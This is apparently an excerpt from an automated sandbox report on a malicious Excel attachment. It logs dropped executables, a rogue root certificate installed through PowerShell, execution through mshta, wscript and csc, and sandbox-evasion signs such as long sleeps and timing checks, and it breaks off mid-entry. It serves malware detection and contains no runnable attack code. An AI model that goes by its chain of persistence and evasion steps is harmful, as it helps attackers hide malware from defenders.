Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00413416 push ecx; iretd	13_2_00413417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0041ECDC push ds; iretd	13_2_0041ECDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401DF5 push ebp; iretd	13_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401DA6 push ebp; iretd	13_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00416EAA push esp; retf	13_2_00416EAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401F0D push eax; retf	13_2_00401F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401FEB push edx; retf	13_2_00401FEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00410FEE push ebp; iretd	13_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00410FF3 push ebp; iretd	13_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401FA4 push edx; ret	13_2_00401FAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401FBA push 0000006Ah; iretd	13_2_00401FC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6DFA1 push ecx; ret	13_2_00A6DFB4

Source: temp_exec.exe.11.dr

Static PE information: section name: .text entropy: 7.96543242796983

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Drops PE files

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\temp_exec.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: PI#0034250924.xla.xlsx	Stream path 'Workbook' entropy: 7.99943505066 (max. 8.0)
Source: F7A30000.0.dr	Stream path 'Workbook' entropy: 7.99950221018 (max. 8.0)

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory allocated: 840000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory allocated: DB0000 memory reserve \| memory write watch			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00AB0101 rdtsc

13_2_00AB0101

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7663			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2301			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 3516	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672	Thread sleep count: 7663 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672	Thread sleep count: 2301 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 3908	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 3932	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3952	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wscript.exe, 0000000B.00000003.522871057.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM
Source: wscript.exe, 0000000B.00000003.525565103.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.526234497.00000000050D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RuxePsphgfshM&&&M4UsMV2mvZbaP0haIE&&&XUIpK
Source: wscript.exe, 0000000B.00000003.517908528.0000000005029000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6r))Utk5SPicnOErW...turhvQe1X2ZlNF
Source: wscript.exe, 0000000B.00000003.519965537.0000000004CB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Rgns2riR&&&c8bm8hA871r;;;NeMO9uohdR/s;;;2mpCQ7wpEIQzlI...DNS;;;e0Alla+miarL;;;ZCetr6q...Hj9LKAWllOqRdlm//rZOZPfkKo/bZpz9LM;;;+noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6rQi'q_
Source: wscript.exe, 0000000B.00000003.521981172.0000000004DAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.521688290.0000000004D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.522157521.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.519965537.0000000004CB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Rgns2riR&&&c8bm8hA871r;;;NeMO9uohdR/s;;;2mpCQ7wpEIQzlI...DNS;;;e0Alla+miarL;;;ZCetr6q...Hj9LKAWllOqRdlm//rZOZPfkKo/bZpz9LM;;;+noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6r
Source: wscript.exe, 0000000B.00000003.528495125.0000000000339000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]RuxePsphgfshM&&&M4UsMV2mvZbaP0haIE&&&XUIpK
Source: wscript.exe, 0000000B.00000003.523365177.000000000502A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.523513557.0000000005049000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.523199784.000000000502A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM:*'q_

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

